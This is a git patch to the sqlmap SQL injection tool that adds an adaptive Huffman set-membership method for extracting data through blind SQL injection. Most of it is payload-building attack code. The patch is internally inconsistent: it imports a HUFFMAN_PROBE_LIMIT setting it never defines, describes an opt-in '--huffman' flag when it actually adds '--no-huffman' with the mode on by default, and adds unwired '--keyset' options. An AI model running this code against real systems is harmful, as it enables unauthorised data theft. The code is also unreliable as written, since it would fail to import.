From 889ad435412487c25bb632bff5cfb2428e32ea29 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Miroslav=20=C5=A0tampar?= Date: Sat, 20 Jun 2026 00:00:22 +0200 Subject: [PATCH] Adding adaptive set-membership (Huffman) retrieval for faster blind dumps --- data/txt/sha256sums.txt | 2 +- lib/core/option.py | 5 ++ lib/core/optiondict.py | 1 + lib/core/settings.py | 2 +- lib/parse/cmdline.py | 13 ++++ lib/techniques/blind/inference.py | 110 ++++++++++++++++++++++++++++++ 6 files changed, 131 insertions(+), 2 deletions(-) diff --git a/data/txt/sha256sums.txt b/data/txt/sha256sums.txt index b7f562c0d..14288ba5a 100644 --- a/data/txt/sha256sums.txt +++ b/data/txt/sha256sums.txt @@ -189,7 +189,7 @@ ccc4a717e887652b1fcce073d9409d9c59a3b28548c703a9e453d15845f90cd7 lib/core/patch 48797d6c34dd9bb8a53f7f3794c85f4288d82a9a1d6be7fcf317d388cb20d4b3 lib/core/replication.py 0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py 888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py -e90183a7b5af8d5dd411cb74e3c24a9320b3194051a19abe0791fffae2b34fea lib/core/settings.py +fcb89f3b6474c6201fe2a77417c5c422e4f81a5f44567a51fb05eb6f6df22e93 lib/core/settings.py cd5a66deee8963ba8e7e9af3dd36eb5e8127d4d68698811c29e789655f507f82 lib/core/shell.py bcb5d8090d5e3e0ef2a586ba09ba80eef0c6d51feb0f611ed25299fbb254f725 lib/core/subprocessng.py 70ea3768f1b3062b22d20644df41c86238157ec80dd43da40545c620714273c6 lib/core/target.py diff --git a/lib/core/option.py b/lib/core/option.py index 5cb69d297..53163bc8e 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -2145,6 +2145,11 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.heuristicTest = None kb.hintValue = "" kb.htmlFp = [] + kb.huffmanModel = {} + kb.huffmanValidated = False + kb.disableHuffman = False + kb.huffmanProbes = 0 + kb.huffmanEscapes = 0 kb.httpErrorCodes = {} kb.inferenceMode = False kb.ignoreCasted = None diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index af5c5ab6b..9270511c0 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -270,6 +270,7 @@ optDict = { "Hidden": { "dummy": "boolean", "disablePrecon": "boolean", + "noHuffman": "boolean", "profile": "boolean", "forceDns": "boolean", "murphyRate": "integer", diff --git a/lib/core/settings.py b/lib/core/settings.py index 3ab135719..da96022a6 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -20,7 +20,7 @@ from lib.core.enums import OS from thirdparty import six # sqlmap version (...) -VERSION = "1.10.6.128" +VERSION = "1.10.6.129" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 1ef639ed6..e369f19c9 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -848,6 +848,9 @@ def cmdLineParser(argv=None): parser.add_argument("--disable-precon", dest="disablePrecon", action="store_true", help=SUPPRESS) + parser.add_argument("--no-huffman", dest="noHuffman", action="store_true", + help=SUPPRESS) # "Disable adaptive (Huffman) set-membership retrieval used by default to speed up blind table dumps" + parser.add_argument("--profile", dest="profile", action="store_true", help=SUPPRESS) @@ -866,6 +869,16 @@ def cmdLineParser(argv=None): parser.add_argument("--force-pivoting", dest="forcePivoting", action="store_true", help=SUPPRESS) + # Experimental: dump table rows via keyset (seek) pagination on a detected indexed + # primary key instead of ORDER BY ... LIMIT/OFFSET (much cheaper on huge tables). + # --keyset forces it for any table size; --no-keyset disables it (incl. the automatic + # use on large tables), falling back to the plain LIMIT/OFFSET dump. + parser.add_argument("--keyset", dest="keyset", action="store_true", + help=SUPPRESS) + + parser.add_argument("--no-keyset", dest="noKeyset", action="store_true", + help=SUPPRESS) + parser.add_argument("--ignore-stdin", dest="ignoreStdin", action="store_true", help=SUPPRESS) diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index 41c490b7f..b1ec44a8d 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -7,6 +7,7 @@ See the file 'LICENSE' for copying permission from __future__ import division +import heapq import re import time @@ -41,6 +42,7 @@ from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapThreadException from lib.core.exception import SqlmapUnsupportedFeatureException from lib.core.settings import CHAR_INFERENCE_MARK +from lib.core.settings import HUFFMAN_PROBE_LIMIT from lib.core.settings import INFERENCE_BLANK_BREAK from lib.core.settings import INFERENCE_EQUALS_CHAR from lib.core.settings import INFERENCE_GREATER_CHAR @@ -64,6 +66,10 @@ from lib.utils.safe2bin import safecharencode from lib.utils.xrange import xrange from thirdparty import six +# Sentinel returned by the opt-in Huffman retrieval (--huffman) meaning "this character is +# outside the ASCII model (e.g. multi-byte/Unicode) - defer to the classic bisection". +_HUFFMAN_FALLBACK = object() + def bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None, dump=False): """ Bisection algorithm that can be used to perform blind SQL injection @@ -270,6 +276,95 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None return result + def huffmanChar(idx): + """ + Adaptive retrieval of a single character using set-membership ("... IN (...)") + questions driven by a Huffman tree built from an online frequency model of the data + retrieved so far (used by default for blind table dumps; '--no-huffman' disables it). + The expected number of requests approaches the + data's entropy (fewer on text/hex), while uniform/binary data yields a balanced tree + (i.e. no penalty versus the classic bisection). + + Correctness does NOT depend on the (shared, racily updated) model: the tree is a + decision tree over the whole 0..127 range plus a dedicated ESCAPE leaf. At every node + the child that does NOT contain ESCAPE is the one tested, so any value outside 0..127 + (e.g. multi-byte/Unicode) fails every membership test, lands on ESCAPE and is handed + back to the classic bisection. Returns the character, or None to fall back. + """ + ESCAPE = -1 + model = kb.huffmanModel + + heap = [] + for order, ordinal in enumerate(xrange(128)): + heapq.heappush(heap, (model.get(ordinal, 0) + 1, order, (ordinal,))) + heapq.heappush(heap, (max(model.get(ESCAPE, 0), 1), 128, (ESCAPE,))) + + counter = 129 + while len(heap) > 1: + w1, _, n1 = heapq.heappop(heap) + w2, _, n2 = heapq.heappop(heap) + heapq.heappush(heap, (w1 + w2, counter, (n1, n2))) + counter += 1 + node = heap[0][2] + + def _concrete(n): + if len(n) == 1: + return [] if n[0] == ESCAPE else [n[0]] + return _concrete(n[0]) + _concrete(n[1]) + + def _hasEscape(n): + return n[0] == ESCAPE if len(n) == 1 else (_hasEscape(n[0]) or _hasEscape(n[1])) + + template = payload.replace("%s%s" % (INFERENCE_GREATER_CHAR, "%d"), " IN (%s)", 1) + + while len(node) == 2: + left, right = node + + if _hasEscape(left): + testNode, otherNode = right, left + elif _hasEscape(right): + testNode, otherNode = left, right + else: + leftLeaves, rightLeaves = _concrete(left), _concrete(right) + testNode, otherNode = (left, right) if len(leftLeaves) <= len(rightLeaves) else (right, left) + + testSet = _concrete(testNode) + setExpr = ','.join(str(_) for _ in testSet) + forgedPayload = safeStringFormat(template, (expressionUnescaped, idx, setExpr)) + result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) + incrementCounter(getTechnique()) + + node = testNode if result else otherNode + + value = node[0] + + if value == ESCAPE: + model[ESCAPE] = model.get(ESCAPE, 0) + 1 + return _HUFFMAN_FALLBACK + + if value == 0: + # ORD(MID(..)) of an empty (past end-of-string) character is 0; mirror the classic + # bisection and signal end-of-string (do NOT pollute the model with the sentinel). + return None + + # One-time safety validation: cross-check the first set-membership result with a short + # equality probe. Unlike the long IN() lists, a single '=N' comparison cannot be + # truncated/mangled by a parameter-length limit or a WAF, so it is a trustworthy oracle. + # If it disagrees, the IN() channel is unreliable here: latch the technique off so the + # classic '>' bisection takes over for the rest of the run (graceful fallback). + if not kb.huffmanValidated: + verifyPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, value)) + verified = Request.queryPage(verifyPayload, timeBasedCompare=timeBasedCompare, raise404=False) + incrementCounter(getTechnique()) + if verified: + kb.huffmanValidated = True + else: + kb.disableHuffman = True + return _HUFFMAN_FALLBACK + + model[value] = model.get(value, 0) + 1 + return decodeIntToUnicode(value) + def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None, retried=None): """ continuousOrder means that distance between each two neighbour's @@ -283,6 +378,21 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None if result: return result + if (not conf.noHuffman and not kb.disableHuffman and dump and continuousOrder and charsetType is None and not timeBasedCompare + and ("%s%s" % (INFERENCE_GREATER_CHAR, "%d")) in payload + and ("'%s'" % CHAR_INFERENCE_MARK) not in payload): + kb.huffmanProbes = (kb.huffmanProbes or 0) + 1 + result = huffmanChar(idx) + if result is not _HUFFMAN_FALLBACK: + return result + # huffman declined this character (Unicode/escape, or failed the validation probe). + # If the set-membership channel keeps escaping it is not paying off here (trimmed/ + # blocked long payloads, or non-ASCII-heavy data) -> latch off so the classic '>' + # bisection takes over efficiently for the rest of the run. + kb.huffmanEscapes = (kb.huffmanEscapes or 0) + 1 + if kb.huffmanProbes >= HUFFMAN_PROBE_LIMIT and kb.huffmanEscapes * 2 >= kb.huffmanProbes: + kb.disableHuffman = True + if charTbl is None: charTbl = type(asciiTbl)(asciiTbl)